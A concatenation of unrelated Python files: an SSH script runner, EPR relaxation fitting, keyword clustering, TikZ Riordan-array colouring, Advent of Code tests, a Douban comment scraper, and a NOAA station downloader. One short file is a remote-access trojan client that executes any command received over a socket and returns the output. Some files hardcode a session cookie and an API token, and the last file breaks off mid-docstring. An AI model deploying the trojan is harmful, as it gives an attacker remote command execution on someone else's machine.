        if out.upper().rstrip() == 'OK':
            error_code = 200
            error = 'OK'
    if len_err > 0:
        # Hide raw shell errors about a missing script path.
        if 'No such file or directory' in error:
            error = 'Script error'
    return dict(code=error_code, message=error)
def call_script(script):
    """Run *script* on the configured remote host over SSH and map its
    output to an HTTP-style response dict via check_errors().

    The command executed is config['path'] + script; each paramiko
    failure mode is logged separately and falls through to the sentinel
    handling in check_errors().
    """
    app.logger.info(script)
    call_arr = []
    # call_arr = [{config['sudo']}, 'ssh', f"{config['user']}@{config['host']}", f"{config['path']}{script}"]
    # if config['fromuser'] and config['fromuser']!='':
    # call_arr = ['/usr/bin/sudo', '-u', f"{config['fromuser']}", 'ssh', f"{config['user']}@{config['host']}", f"{config['path']}{script}"]
    app.logger.info(str(call_arr))
    # result = subprocess.call(call_arr)
    # Int sentinels: check_errors() treats ints as "exec never happened".
    stdin, stdout, stderr = (555, 555, 555)
    app.logger.info(f"try to connect... hostname={config['host']}, username={config['user']}, port={config['port']}")
    try:
        ssh.connect(hostname=config['host'], username=config['user'], port=config['port'], pkey=ssh_key)
        app.logger.info(f"try exec command: {config['path']}{script}")
        stdin, stdout, stderr = ssh.exec_command(f"{config['path']}{script}")
    except paramiko.PasswordRequiredException as exp:
        app.logger.error(f'password required: {exp}')
    except paramiko.BadAuthenticationType as exp:
        app.logger.error(f'bad auth type: {exp}')
    except paramiko.BadHostKeyException as exp:
        app.logger.error(f'bad host key: {exp}')
    except paramiko.AuthenticationException as exp:
        app.logger.error(f'auth exception: {exp}')
    except paramiko.SSHException as exp:
        app.logger.error(f'core ssh exception: {exp}')
    except Exception as exp:
        app.logger.error(f'pure exception: {exp}')
    return check_errors(stdout, stderr) # {'result':stdout, 'error': stderr}
if __name__ == '__main__':
    # Dev entry point: listen on all interfaces, default Flask port 5000.
    app.logger.info('run app on 0.0.0.0:5000')
    app.run(host='0.0.0.0')
|
import socket
import subprocess
import time
import os
host = '127.0.0.1'
port = 52918
password = '' #soon askfor password
#issue : security
#-solution : add password with hashing base64/md5 to matching server password if timeout 3/5 second without password then DIE
#-solution : send header to matching the rat client not accessed from telnet
#function for run the remote task and send back to server
def action():
cmd = server_conn.recv(1024)
cmd = cmd.decode()
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
if(stdout_value == b''):
server_conn.send(b'Done.')
else:
server_conn.send(stdout_value)
#unlimited loop action
while(1):
try:
server_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_conn.connect((host, port))
print("[*] Connected")
#loop when get message from server then call function at function action
while 1:
try:
msg = b''
action()
except socket.error:
print("[-] Connection error...")
break
print("[-] Session Closed")
server_conn.close()
time.sleep(3)
print("[*] Reconnecting to the server")
except socket.error:
print("[-] Can't reach the server...")
time.sleep(3)
|
#!/usr/bin/python
'''
plot_log in DeepGeom
author : cfeng
created : 1/31/18 7:49 AM
'''
import os
import sys
import glob
import time
import argparse
import numpy as np
from matplotlib import pyplot as plt
from utils import TrainTestMonitor as TTMon
#from Tkinter import Tk
#import tkFileDialog
def main(args):
    """Load saved loss curves from args.log_dir and plot them.

    NOTE(review): args.log_dir is concatenated directly, so it must end
    with a path separator -- consider os.path.join.
    NOTE(review): indexing np.load('...iter_loss.npy') with the key
    "iter_loss" only works for .npz archives / structured arrays;
    confirm the file format matches.
    """
    '''
    if not os.path.exists(args.log_dir):
        tkroot = Tk()
        tkroot.withdraw()
        args.log_dir = tkFileDialog.askdirectory(title='select log folder', initialdir='../logs', mustexist=True)
        tkroot.destroy()
    assert(os.path.exists(args.log_dir))
    ttm = TTMon(args.log_dir,plot_extra=args.plot_extra!=0)
    plt.show()
    '''
    test = np.load(args.log_dir + 'iter_loss.npy')
    train_running = np.load(args.log_dir + 'stats_train_running.npz')
    # Plot column 1 of each record (presumably the loss value, with
    # column 0 the iteration index -- confirm).
    plt.plot(test["iter_loss"][:,1])
    plt.show()
    plt.plot(train_running["iter_loss"][:,1])
    plt.show()
if __name__ == '__main__':
    # CLI: -d/--log_dir selects the folder of saved stats; -e/--plot_extra
    # is accepted but only used by the commented-out TTMon path in main().
    parser = argparse.ArgumentParser(sys.argv[0])
    parser.add_argument('-d','--log_dir',type=str, default='', help='log folder')
    parser.add_argument('-e','--plot_extra',type=int, default=0, help='plot training accuracy and test loss')
    args = parser.parse_args(sys.argv[1:])
    # Folder containing this script (not used by main() above).
    args.script_folder = os.path.dirname(os.path.abspath(__file__))
    main(args)
|
import Tkinter, tkFileDialog
import numpy as np
import scipy.integrate as integrate
import matplotlib.pyplot as plt
# Hard-coded data file; a Tk file-picker is the fallback when it is empty.
# NOTE(review): the Windows path relies on '\M', '\L' etc. not being valid
# escape sequences -- a raw string would be safer.  Tkinter/tkFileDialog
# imports are Python 2 names; this script runs under Python 2 only.
filepath = 'G:\My Drive\Lab\UIUC EPR Data\Day 2\T1\data_fit_stretchedInvRec2\\temp_dep_stretched.txt'
if filepath == '':
    root = Tkinter.Tk()
    root.withdraw()
    filepath = tkFileDialog.askopenfilename()
def J8(y): #function definitions
return integrate.quad(lambda x: (x**8)*
(np.e**(x)/((np.e**(x)-1)**2)), 0, y)
def direct_process(x, a):
    """Direct-process relaxation rate: linear in temperature with slope a."""
    rate = a * x
    return rate
def raman_process(x, b, theta):
    """Raman-process rate: b * (x/theta)^9 * J8(theta/x)."""
    return b * (((x/theta)**9) * J8(theta/x)[0])
def local_modes(x, c, delta):
    """Local-mode rate: c * e^(delta/x) / (e^(delta/x) - 1)^2."""
    return c * np.e**(delta/x)/((np.e**(delta/x)-1)**2)
def fitfunc(T, a, b, c, d, e): #a = dir, b = ram, c = loc, d = delta, e = theta
    """Total relaxation-rate model: direct + Raman + local-mode terms."""
    total = direct_process(T, a) + raman_process(T, b, e) + local_modes(T, c, d)
    return total
# NOTE(review): the print statements below use Python 2 syntax, so this
# script runs only under Python 2.
vfitfunc = np.vectorize(fitfunc) #scipy.integrate and scipy.optimize.curve_fit don't play nicely if it isn't vectorized
vraman = np.vectorize(raman_process)
#vreg_fitfunc = np.vectorize(reg_fitfunc)
#################################################################
# parameters
#################################################################
# Initial guesses for the relaxation-model parameters.
direct = 10.5
raman = 1000000
local = 10**4
delta = 300
theta = 160
#################################################################
#
#################################################################
params = np.array([direct, raman, local, delta, theta])
#bnds = [(d_lower, r_lower, l_lower, dta_lower, t_lower),(d_upper, r_upper, l_upper, dta_upper, t_upper)]
# Data file: column 0 is used as T (x-axis), column 1 feeds the rate.
a = np.loadtxt(filepath, delimiter=',')
#print a
T = a[:,0]
# Rate axis: log10 of 1 / (column1 scaled by 1e9).
y = np.log10(1/(a[:,1]/10**9))
print a[:,1]
print y
reg_y = 1/a[:,1]
print reg_y
#print T, y
#popt, pcov = scipy.optimize.curve_fit(vfitfunc, T , y, params, bounds = bnds, gtol = 1e-15, max_nfev = 10000)
#perr = np.sqrt(np.diag(pcov))
#direct, raman, local, delta, theta = popt
#d_err, r_err, l_err, dta_err, th_err = perr
# Plot the data (green dots) against the total model (red) and each
# component: direct (blue), Raman (cyan), local modes (magenta).
plt.plot(T, y, 'go', T, np.log10(vfitfunc(T , params[0], params[1], params[2], params[3], params[4])), 'r--',
         T, np.log10(direct_process(T , params[0])), 'b--',
         T, np.log10(vraman(T , params[1], params[4])), 'c--',
         T, np.log10(local_modes(T , params[2], params[3])), 'm--'
         )
plt.gca().set_ylim(bottom=0, top=np.amax(y)+1)
plt.show()
#!/usr/bin/env python
"""
Package specific script that 'builds' the package content as part of the
publish process.
Usage: build <pkgroot>
Returns: If the build is successful, then the script returns '0'; else
a non-zero value is returned.
"""
#------------------------------------------------------------------------------
# Begin the build process
# FIX: converted the Python 2 print statement to print() so the stub also
# runs under Python 3.
print("Building....")
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
import numpy as np
import sys
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
# Receive the input filename passed on the command line
filename = sys.argv[1]
# filename = "admin2.csv"
# Load the data source
# print("start to read file")
case_train = np.genfromtxt("{}".format(filename), delimiter=',',encoding="utf-8")
case_train1 = np.delete(case_train,0,axis=0)
try:
    v = pd.read_csv("{}".format(filename),header=None,encoding="utf-8")
except Exception as e:
    print(e)
# Read the keywords (the CSV header row)
keywords = pd.read_csv("{}".format(filename), nrows=0,encoding="utf-8")
keywords = list(keywords)
# Drop the first row (and first column, if there are field names)
# NOTE(review): the header row is deleted twice -- the case_train1 above
# is discarded and rebuilt here; confirm the first deletion was intended.
case_train = np.delete(case_train,0,axis=0)
case_train1=np.array(case_train)
# Transpose so each row of `a` is one keyword's value vector
a = case_train1.T
# print(a)
# NOTE(review): 'global' at module level is a no-op; kept as-is.
global list1
global list3
global list4
global list6
global data_list
list1 = []
list3 = []
list4 = []
list6 = []
data_list = []
total_dic = {}
for i in a:
    for k in a:
        c = [i,k]
        # Sum the matrix obtained from comparing the two rows (the
        # co-occurrence frequency of A and B):
        # element-wise minimum of the two rows (minimum of the A/B overlap)
        ik = np.min(c, axis=0)
        sum_two = ik.sum()
        list3.append(sum_two)
n = len(a)
# Pairwise co-occurrence frequency matrix (n x n)
data_save = [list3[i:i + n] for i in range(0, len(list3), n)]
data_save = np.array(data_save)
# Similarity matrix labelled with the keywords
# data_save = DataFrame(data_save,index=keywords,columns=keywords)
clf = PCA(n_components=2)
data_save = clf.fit_transform(data_save)
# Build the clusterer with n clusters (the number of classes in the
# clustering dendrogram)
estimator = KMeans(n_clusters=3)
# Cluster
estimator.fit(data_save)
# Fetch the cluster labels
label_pred = estimator.labels_
# Marker/colour codes for up to 10 clusters
mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '<r', 'pr']
# Fetch the cluster centres
centroids = estimator.cluster_centers_
# Fetch the total within-cluster criterion (inertia)
inertia = estimator.inertia_
data_save = data_save.T
# print(data_save)
x = data_save[0]
y = data_save[1]
fig = plt.figure(figsize=(30, 25),dpi=80)
plt.scatter(x, y)
# xy is the point to annotate; xytext is where its label is drawn
for i in range(len(x)):
    plt.annotate(keywords[i], xy = (x[i], y[i]), xytext = (x[i]+0.1, y[i]+0.1))
picname = filename.replace(".csv","")
picname = picname+"_kmeans.png"
plt.savefig(picname)
|
# this is a simple attempt to make a *navigable* documentation within |Vim|
from sage.rings.integer import Integer
from riordan_utils import *
from riordan_group import *
from riordan_visiting import *
class AbstractTriangleShape:
    """Base class producing TikZ node templates for triangle cells.

    Subclasses supply the column-offset sub-template that positions a cell
    horizontally; this class assembles the full node template and fills it
    with concrete values.
    """
    def format_tikz_node_template_string(self, **kwds):
        """Instantiate the node template with concrete colour/row/col values."""
        template = self.build_tikz_node_template_string()
        return template.format(**kwds)
    def build_tikz_node_template_string(self):
        """Assemble the full TikZ node template around the column offset."""
        prefix = r'\node[box={colour}] (p-{row}-{col}) at ('
        suffix = r',-{row}) {{}};'
        return prefix + self.build_column_offset_template_substring() + suffix
    def build_column_offset_template_substring(self):
        """Hook: return the x-coordinate sub-template (subclass responsibility)."""
        pass
class PlainTriangleShape(AbstractTriangleShape):
    """Left-aligned triangle: a cell's x-coordinate is simply its column."""
    def build_column_offset_template_substring(self):
        # Column index used directly as the x offset.
        return r'{col}'
    def __str__(self):
        # Name used when this shape appears in filenames/summaries.
        return 'plain'
class CenteredTriangleShape(AbstractTriangleShape):
    """Symmetric (Pascal-like) triangle: each row is shifted left by row/2."""
    def build_column_offset_template_substring(self):
        # Centering offset: shift the row left by half its index.
        return r'-{row}/2+{col}'
    def __str__(self):
        # Name used when this shape appears in filenames/summaries.
        return 'centered'
class NegativesStrFormatter:
    """Render a negatives-handling choice as a short keyword via double dispatch."""
    def __init__(self, negatives_handling_choice):
        # The choice object calls back into one of the dispatched_from_* methods.
        self.negatives_handling_choice = negatives_handling_choice
    def __str__(self):
        """Delegate to the choice, which picks the matching callback below."""
        return self.negatives_handling_choice.dispatch_on(self)
    def dispatched_from_IgnoreNegativesChoice(self, choice):
        """Callback for the ignore-negatives strategy."""
        return "ignore"
    def dispatched_from_HandleNegativesChoice(self, choice):
        """Callback for the handle-negatives strategy."""
        return "handle"
class ColouringTemplateStringBuilder:
    """Choose a description template (filename- or summary-flavoured) via dispatch."""
    def build_using(self, target):
        # `target` routes back into one of the dispatched_from_* methods.
        return target.dispatch_on(self)
    def dispatched_from_ForFilename(self, for_target):
        """Hyphenated form, safe for use as a file name."""
        return r"{colouring_scheme}-{negatives}-negatives-{shape}-colouring-{rows}-rows"
    def dispatched_from_ForSummary(self, for_target):
        """Comma-separated, human-readable form."""
        return r"{colouring_scheme}, {negatives} negatives, {shape} colouring, {rows} rows"
class TriangleColouring:
    """Render a Riordan-style triangle as coloured TikZ nodes.

    Combines a colouring scheme, a triangle shape (centered or left-aligned)
    and a negatives-handling strategy, and produces LaTeX/TikZ code for the
    first `order` rows of a Riordan array.
    """
    def __init__(self, colouring_scheme, order=127, centered=True, handle_negatives=False):
        self.colouring_scheme = colouring_scheme
        self.order = order  # number of triangle rows to draw
        self.shape = CenteredTriangleShape() if centered else PlainTriangleShape()
        self.negatives_handling_choice = (HandleNegativesChoice() if handle_negatives
                                else IgnoreNegativesChoice())
        self.template_string_builder = ColouringTemplateStringBuilder()
    def str_for(self, filename=False, summary=False):
        """Describe this colouring, formatted for a filename or for a summary.

        NOTE(review): `summary` is never consulted -- any call with
        filename=False yields the summary form; confirm this is intended.
        """
        template_target = ForFilename() if filename else ForSummary()
        template_string = self.template_string_builder.build_using(template_target)
        return template_string.format(
            colouring_scheme=self.colouring_scheme,
            shape=self.shape,
            rows=self.order,
            negatives=NegativesStrFormatter(self.negatives_handling_choice))
    def colouring(self, partitioning,
                  on_tikz_node_generated=lambda node: node,
                  casting_coeff=lambda coeff: Integer(coeff)):
        """Build the (handler, None) tuple consumed by the LaTeX generator."""
        def handler(row_index, col_index, coeff):
            # Map the coefficient to its equivalence class, then to a colour,
            # then to a formatted TikZ node for this cell.
            eqclass_witness = partitioning.partition(
                self.negatives_handling_choice, casting_coeff(coeff))
            colour_code = partitioning.colours_table().colour_of(
                self.negatives_handling_choice, eqclass_witness)
            tikz_node = on_tikz_node_generated(
                self.shape.format_tikz_node_template_string(
                    row=row_index, col=col_index, colour=colour_code))
            return tikz_node
        return handler, None
    def __call__(self, d=None, h=None, array=None,
                 explicit_matrix=None, partitioning=None,
                 handle_triangular_region_only=True):
        """Produce (latex_matrix, tikz_nodes) for the given array specification.

        Exactly one of the (d, h) pair, `explicit_matrix` or `array`
        selects the input; raises when none is given.
        """
        colouring_handlers = self.colouring(partitioning)
        order = self.order
        if d and h:
            # First ensures that both `d' both `h' use the same *indeterminate*
            assert d.args() == h.args() and len(d.args()) == 1
            Riordan_array = RiordanArray(
                SubgroupCharacterization(
                    VanillaDHfunctionsSubgroup(d, h, d.args()[0])))
        elif explicit_matrix:
            # An explicit matrix also fixes the order to its own dimension.
            Riordan_array, order = explicit_matrix, explicit_matrix.dimensions()[0]
        elif array: Riordan_array = array
        else: raise Exception("No array to work with")
        result_matrix, tikz_coloured_nodes, _ = Riordan_matrix_latex_code (
            array=Riordan_array, order=order,
            handlers_tuple=colouring_handlers,
            handle_triangular_region_only=handle_triangular_region_only)
        return result_matrix, tikz_coloured_nodes
|
# Advent of Code 2020 regression tests: each test imports a solved challenge
# module and pins the known-correct answers for this author's puzzle input.
def test_challenge1():
    from challenge1 import ENTRIES, get_entries_summing_to
    assert get_entries_summing_to(ENTRIES, 2020) == (438, 1582)
    assert get_entries_summing_to(ENTRIES, 2020, 3) == (688, 514, 818)
def test_challenge2():
    from challenge2 import PASSWORDS, get_number_of_valid_passwords, get_number_of_old_valid_passwords
    assert get_number_of_old_valid_passwords(PASSWORDS) == 410
    assert get_number_of_valid_passwords(PASSWORDS) == 694
def test_challenge3():
    from challenge3 import TREE_GRID, get_number_of_trees_hit
    assert get_number_of_trees_hit(TREE_GRID, 3) == 265
def test_challenge4():
    from challenge4 import PASSPORTS, get_number_of_valid_passports, get_number_of_valid_data_passports
    assert get_number_of_valid_passports(PASSPORTS) == 222
    assert get_number_of_valid_data_passports(PASSPORTS) == 140
def test_challenge5():
    from challenge5 import BOARDING_PASSES, get_highest_seat_id, find_seat_id
    assert get_highest_seat_id(BOARDING_PASSES) == 976
    assert find_seat_id(BOARDING_PASSES) == 685
def test_challenge6():
    from challenge6 import QUESTIONS, get_sum_of_all_yes_counts, get_sum_of_any_yes_counts
    assert get_sum_of_any_yes_counts(QUESTIONS) == 6506
    assert get_sum_of_all_yes_counts(QUESTIONS) == 3243
def test_challenge7():
    from challenge7 import BAG_RULES, get_number_of_bags_able_to_hold_bag, get_number_of_bags_inside
    assert get_number_of_bags_able_to_hold_bag(BAG_RULES, "shiny gold") == 302
    assert get_number_of_bags_inside(BAG_RULES, "shiny gold") == 4165
def test_challenge8():
    from challenge8 import INSTRUCTIONS, Computer, get_accumulator_after_fixing_program
    computer = Computer(INSTRUCTIONS)
    assert computer.get_accumulator_after_stop()[1] == 1797
    assert get_accumulator_after_fixing_program(INSTRUCTIONS) == 1036
def test_challenge9():
    from challenge9 import NUMBERS, find_first_wrong_number, find_encryption_weakness
    assert find_first_wrong_number(NUMBERS) == 21806024
    assert find_encryption_weakness(NUMBERS) == 2986195
def test_challenge10():
    from challenge10 import ADAPTERS, find_all_ways_to_arrange_adapters, get_joltage_product
    assert get_joltage_product(ADAPTERS) == 1820
    assert find_all_ways_to_arrange_adapters(ADAPTERS) == 3454189699072
# skipping 11 - it takes too long
def test_challenge12():
    from challenge12 import MOVES, get_manhattan_distance_after_waypoint_moves, get_manhattan_distance_after_travelling
    assert get_manhattan_distance_after_travelling(MOVES) == 2847
    assert get_manhattan_distance_after_waypoint_moves(MOVES) == 29839
def test_challenge13():
    from challenge13 import TIMESTAMP, BUS_IDS, find_timestamp_for_consecutive_busses, get_first_bus_after_timestamp
    assert get_first_bus_after_timestamp(TIMESTAMP, BUS_IDS) == 2045
    assert find_timestamp_for_consecutive_busses(BUS_IDS) == 402251700208309
def test_challenge14():
    from challenge14 import INSTRUCTIONS, get_sum_of_memory, get_sum_of_memory_v2
    assert get_sum_of_memory(INSTRUCTIONS) == 11612740949946
    assert get_sum_of_memory_v2(INSTRUCTIONS) == 3394509207186
def test_challenge15():
    """Regression-pin challenge 15's answers for this puzzle input."""
    from challenge15 import PREAMBLE, get_nth_word_spoken
    # BUG FIX: the comparisons were inside the call -- e.g.
    # get_nth_word_spoken(PREAMBLE, 10 == 273) -- which passed the boolean
    # False as n and then asserted the (truthy) return value, so these
    # assertions could never fail.
    assert get_nth_word_spoken(PREAMBLE, 10) == 273
    assert get_nth_word_spoken(PREAMBLE, 300000) == 47205
# Regression pins for challenges 16-25 (continued from above).
def test_challenge16():
    from challenge16 import TICKET_DATA
    assert TICKET_DATA.get_ticket_scanning_error_rate() == 25984
    assert TICKET_DATA.get_departure_fields_product() == 1265347500049
def test_challenge17():
    from challenge17 import STARTING_DATA, get_active_squares_after_n_cycles
    assert get_active_squares_after_n_cycles(STARTING_DATA, 6) == 359
def test_challenge18():
    from challenge18 import EQUATIONS, get_sum_of_equations
    assert get_sum_of_equations(EQUATIONS) == 8298263963837
    assert get_sum_of_equations(EQUATIONS, True) == 145575710203332
def test_challenge19():
    from challenge19 import MESSAGE_DATA_WITH_SUBSTITUTIONS, MESSAGE_DATA
    assert MESSAGE_DATA.get_number_of_matching_rules("0") == 241
    assert MESSAGE_DATA_WITH_SUBSTITUTIONS.get_number_of_matching_rules("0") == 424
def test_challenge20():
    from challenge20 import ASSEMBLED_TILES, get_corners_multiplied, get_non_sea_monsters
    assert get_corners_multiplied(ASSEMBLED_TILES) == 111936085519519
    assert get_non_sea_monsters(ASSEMBLED_TILES) == 1792
def test_challenge21():
    from challenge21 import MEALS, get_number_of_times_nonallergen_ingredients_appear, get_canonically_dangerous_ingredient
    assert get_number_of_times_nonallergen_ingredients_appear(MEALS) == 2203
    assert get_canonically_dangerous_ingredient(MEALS) == 'fqfm,kxjttzg,ldm,mnzbc,zjmdst,ndvrq,fkjmz,kjkrm'
def test_challenge22():
    from challenge22 import DECKS, get_winning_score_recursive, get_winning_score
    assert get_winning_score(DECKS) == 33098
    assert get_winning_score_recursive(DECKS) == 35055
def test_challenge23():
    from challenge23 import ARRANGEMENT, get_labels_after_1
    assert get_labels_after_1(ARRANGEMENT, 100) == '39564287'
def test_challenge24():
    from challenge24 import TILES, get_final_number_of_flipped_tiles, get_flipped_tiles
    assert get_flipped_tiles(TILES) == 312
    assert get_final_number_of_flipped_tiles(TILES) == 3733
def test_challenge25():
    from challenge25 import get_encryption_key, CARD_PUBLIC_KEY, DOOR_PUBLIC_KEY
    assert get_encryption_key(CARD_PUBLIC_KEY, DOOR_PUBLIC_KEY) == 11576351
|
# Demonstrate that list.copy() produces an independent shallow copy.
# BUG FIX: the original named its variable `list`, shadowing the builtin
# type for the rest of the module.
items = ['1', '2', '3']
items_copy = items.copy()
print(items)
print(items_copy)
import requests
import re
from bs4 import BeautifulSoup
from lxml import etree
import time
# Request headers for movie.douban.com.
# NOTE(review): the hard-coded session cookie was captured from a browser,
# will expire, and leaks a session if this file is shared -- confirm it
# should not be moved out of source control.
head = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
    'Host': 'movie.douban.com',
    'Cookie': 'll="118208"; bid=7oCzYf0fk0w; _pk_ref.100001.4cf6=%5B%22%22%2C%22%22%2C1'
              '543191350%2C%22https%3A%2F%2Fwww.baidu.com%2Fs%3Fie%3Dutf-8%26f%3D8%26rsv_b'
              'p%3D1%26rsv_idx%3D1%26tn%3Dmonline_6_dg%26wd%3D%25E8%25B1%2586%25E7%2593%25'
              'A3%26oq%3D%2525E7%25258C%2525AB%2525E7%25259C%2525BC%2525E7%252594%2525B5%'
              '2525E5%2525BD%2525B1%26rsv_pq%3D92f0bbb10001cda4%26rsv_t%3D8bc8J0WsOLTeWlY'
              'lTmTtiC2GrQJJ%252Bjv4IBc%252BiO%252FoESrXmrO3%252FfpNx%252FJTDJnnzkObnLrS%2'
              '6rqlang%3Dcn%26rsv_enter%3D1%26inputT%3D1016%26rsv_sug3%3D41%26rsv_sug1%3D'
              '36%26rsv_sug7%3D100%26rsv_sug2%3D0%26rsv_sug4%3D1712%22%5D; _pk_id.100001.4'
              'cf6=e5dddf1ba3ddddc7.1543191350.1.1543191673.1543191350.; _pk_ses.100001.4c'
              'f6=*; ap_v=0,6.0; __yadk_uid=zaO3DBqlq1sYsYvkjrtRzfCR1VaIP7Vn; __utma=3014'
              '9280.81002317.1543191351.1543191351.1543191351.1; __utmb=30149280.0.10.154'
              '3191351; __utmc=30149280; __utmz=30149280.1543191351.1.1.utmcsr=(direct)|ut'
              'mccn=(direct)|utmcmd=(none); __utma=223695111.1225746777.1543191351.1543191'
              '351.1543191351.1; __utmb=223695111.0.10.1543191351; __utmc=223695111; __utmz=2'
              '23695111.1543191351.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E'
              '8%B1%86%E7%93%A3; _vwo_uuid_v2=DFAB26D354461D79AFD2E9930EE48773C|babee1b1bca2'
              'dad586f81c66493a0f5d'
}
# Query-string parameters for the comments endpoint; 'start' is filled in
# per page by url().
params = {
    'limit': "20",
    'sort': "new_score",
    'start': None,
    'status': 'P'
}
# Accumulators shared by all of the parser variants below:
# comment_user collects usernames; comment_info collects (time, text) tuples.
comment_user = []
comment_info = []
def url(n):
    """Build the comment-page URL for offset `n`, also recording it in `params`."""
    global params
    params['start'] = n
    base = 'https://movie.douban.com/subject/3168101/comments?start={}&limit=20&sort=new_score&status=P'
    return base.format(n)
def get_page(page_url):
    """Fetch one comment page and return its decoded HTML text."""
    global params
    resp = requests.get(page_url, headers=head, params=params)
    resp.encoding = 'utf-8'  # force UTF-8 so Chinese text decodes correctly
    return resp.text
def parse_with_re(response):
    """Regex variant: extract authors, timestamps and comment bodies,
    appending them to the module-level accumulators."""
    global comment_info, comment_user
    author = re.findall(r'<a title="(.*?)" href=', response)
    commenttime = re.findall(r'class="comment-time " title="(.*?)">', response)
    # (.|\n) is grouped, so findall yields tuples; the full body is element 0.
    raw_comments = re.findall(r'class="short">((.|\n)*?)</span>', response)
    bodies = [pair[0] for pair in raw_comments]
    for idx in range(len(raw_comments)):
        comment_user.append(author[idx])
        # (timestamp, body) tuples, aligned by position on the page.
        comment_info.append((commenttime[idx], bodies[idx]))
    return
def parse_with_bs(response):
    """BeautifulSoup variant: extract authors, timestamps and comment bodies,
    appending them to the module-level accumulators."""
    global comment_user, comment_info
    soup = BeautifulSoup(response, 'lxml')
    # Each avatar div wraps an <a> whose title attribute is the username.
    usernames = [tag.a.get('title') for tag in soup.find_all('div', class_="avatar")]
    times = soup.find_all('span', class_="comment-time ")
    comments = soup.find_all('span', class_="short")
    for idx in range(len(comments)):
        comment_user.append(usernames[idx])
        # (timestamp, body) tuples, aligned by position on the page.
        comment_info.append((times[idx].get('title'), comments[idx].text))
    return
def parse_with_lxml(response):
    """lxml/XPath variant: extract authors, timestamps and comment bodies,
    appending them to the module-level accumulators."""
    global comment_info, comment_user
    tree = etree.HTML(response)
    users = tree.xpath('//div[@class="avatar"]/a/@title')
    stamps = tree.xpath('//span[@class="comment-time "]/@title')
    bodies = tree.xpath('//span[@class="short"]/text()')
    for idx in range(len(bodies)):
        comment_user.append(users[idx])
        # (timestamp, body) tuples, aligned by position on the page.
        comment_info.append((stamps[idx], bodies[idx]))
    return
# Script entry point: crawl comment pages, parse them, dump the results to a
# CSV-ish text file, and report the elapsed wall-clock time.
if __name__ == '__main__':
    start_time = time.time()
    for i in range(1):
        # the range() bound controls how many pages are crawled
        print('正在爬取第 %d 页' % (i+1))
        resp = get_page(url(i))
        parse_with_bs(resp)
    length = len(comment_info)
    with open('venom.csv', 'w', encoding='utf-8') as f:
        for i in range(length):
            f.write('"用户名",{0},"评论时间",{1},"评论内容",{2}\n'.format(
                comment_user[i],
                comment_info[i][0],
                comment_info[i][1]))
    # Earlier csv-module based writer, kept for reference:
    # with open('venom.csv', 'w') as csvfile:
    #     csvfile.write(codecs.BOM_UTF8)
    #     file = csv.writer(csvfile, dialect='excel')
    #     for i in range(length):
    #         file.writerow('"用户名",{0},"评论时间",{1},"评论内容",{2}\n'.format(
    #             comment_user[i],
    #             comment_info[i][0],
    #             comment_info[i][1]))
    # print(comment_info[4][1])  # spot-check that the text is not garbled
    # for nn in comment_info:
    #     print(nn[1])
    end_time = time.time()
    all_time = end_time - start_time
    print(all_time)
|
import requests
import json
import pandas as pd
#
# Get all weather stations available at Climate Data Online Web Services
# found on the map within USA coordinates +/- Bermuda, Bahamas etc. having name ending in US
# having data available starting start_date
# Service Doc: https://www.ncdc.noaa.gov/cdo-web/webservices/v2#stations
#
# in: https://www.ncdc.noaa.gov/cdo-web/api/v2/stations
# out: stations.json ->
# [ {"elevation":0,
#     "mindate":"yyyy-mm-dd",
#     "maxdate":"yyyy-mm-dd",
#     "latitude":32.3667,
#     "name":"",
#     "datacoverage":[0-1),
#     "id":"",
#     "elevationUnit":"METERS",
#     "longitude":-64.6833
#  }, ... ]
#
# SECURITY NOTE(review): the API token is committed in source; move it to an
# environment variable before sharing this script.
cdo_token = 'davQIOzciXPWdFXJzJLAZXGfCdyrOEiq'
header = {'token': cdo_token}
base_url = 'https://www.ncdc.noaa.gov/cdo-web/api/v2'
stations_endpoint = '/stations'
# First request is only used to learn how many stations match the filter.
start_date = '2019-12-01'
usa_extent = '15.82,-166.5,70.0,-62.0'
response = requests.get(base_url + stations_endpoint,
                        params={'startdate': start_date,
                                'extent': usa_extent},
                        headers=header)
station_count = response.json()['metadata']['resultset']['count']
# Page through the stations, `limit` at a time.
limit = 1000
offset = 0
# BUG FIX: ceiling division.  The old `station_count // limit + 1` issued one
# extra request whenever the count was an exact multiple of `limit`, and that
# out-of-range response carries no 'results' key (KeyError).
no_requests = -(-station_count // limit)
stations = []
for i in range(no_requests):
    params = {'offset': offset, 'limit': limit, 'startdate': start_date, 'extent': usa_extent}
    response = requests.get(base_url + stations_endpoint, params=params, headers=header)
    assert response.status_code == 200
    # Defensive: a page with no matches may omit 'results' entirely.
    stations_subset = response.json().get('results', [])
    for station in stations_subset:
        # Keep only stations whose name marks them as inside the US.
        if station['name'].endswith(' US'):
            stations.append(station)
    offset += limit
# Emit either JSON or CSV depending on the switch below.
output_type = 'csv'
output_file = 'stations'
if output_type == 'json':
    output_structure = {'count': len(stations), 'stations': stations}
    with open(output_file + '.json', 'w') as f:
        json.dump(output_structure, f)
elif output_type == 'csv':
    df = pd.DataFrame(stations)
    df.to_csv(output_file + '.csv', index=False)
print('Saved ' + str(len(stations)) + ' stations to ' + output_file)
|
#!/Users/apple/silver/projects/PERSONAL/STEGANOGRAPHY/stenoENV/bin/python3.8
# Virtualenv console-script shim: delegates to lib2to3's command-line entry
# point with the standard fixer package and exits with its status code.
import sys
from lib2to3.main import main
sys.exit(main("lib2to3.fixes"))
|
# Usage: $ python3 get_sac_files_lines.py /home/kevin/Desktop/sac-data/stats output.csv
# python3 get_sac_files_lines.py <merged_files> <merged_files> <output_path>
#
# Merges all the extracted contribution per tag data into one single file.
__author__ = 'kevin'
import sys
import csv
import os
# RQ 1: one summary row per project -- the percentage of lines and of files
# whose knowledge is concentrated in a single developer at the 70/80/90% levels.
csv_header = ['project'] + [
    '{}% {}'.format(pct, unit) for pct in (70, 80, 90) for unit in ('lines', 'files')
]
def _concentration_stats(data, threshold):
    """Return (lines_pct, files_pct): the share of total lines and of files
